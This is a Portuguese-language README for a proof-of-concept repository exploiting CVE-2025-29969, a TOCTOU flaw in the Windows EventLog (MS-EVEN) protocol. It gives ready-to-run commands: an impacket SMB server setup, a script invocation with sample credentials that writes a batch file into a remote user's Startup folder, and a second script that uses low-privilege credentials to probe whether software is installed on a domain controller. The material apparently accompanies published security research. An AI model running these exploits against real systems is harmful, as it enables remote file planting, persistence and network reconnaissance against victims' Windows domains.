
Exploração da CVE-2025-29969
EventLogin é uma vulnerabilidade de tempo de verificação e tempo de uso (TOCTOU) no protocolo MS-EVEN. A vulnerabilidade permite que usuários com baixos privilégios escrevam arquivos arbitrários em uma máquina remota, efetivamente contornando a necessidade de uma conta de Administrador para uma gravação remota.
Existem dois scripts neste repositório: um que explora a vulnerabilidade (write_file_remotely.py) e outro que utiliza uma das primitivas da vulnerabilidade para verificar se um arquivo remoto existe ou não, como um usuário de baixo privilégio, o que é útil, por exemplo, para ver programas instalados em outros computadores do domínio.
Você pode ler a análise completa aqui:
EventLog-in: Propagating With Weak Credentials Using the Eventlog Service in Microsoft Windows
Primeiro, crie um compartilhamento SMB usando o impacket:
impacket-smbserver -smb2support Share /tmp/safebreach
Nota: o script usa o nome de compartilhamento fixo 'Share', modifique se necessário.
Em seguida, execute o script write_file_remotely.py e inclua todos os parâmetros necessários:
Exemplo:
python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\\Users\\lowuser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.bat"
Este script não utiliza a vulnerabilidade em si, ele usa apenas a primitiva "CreateFile" e pode ajudar a reconhecer a rede. Por exemplo, o diretório Program Files de uma máquina remota em um domínio é acessível a todo o grupo 'Users', o que significa que usando credenciais de QUALQUER usuário você pode verificar se um arquivo existe ou não em outra máquina.
Ele aceita os seguintes parâmetros:
Por exemplo, veja se o wireshark está instalado no DC (192.168.56.57) usando um usuário de baixo privilégio.
python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"
Result:
FILE_EXISTS_AND_IS_DIRECTORY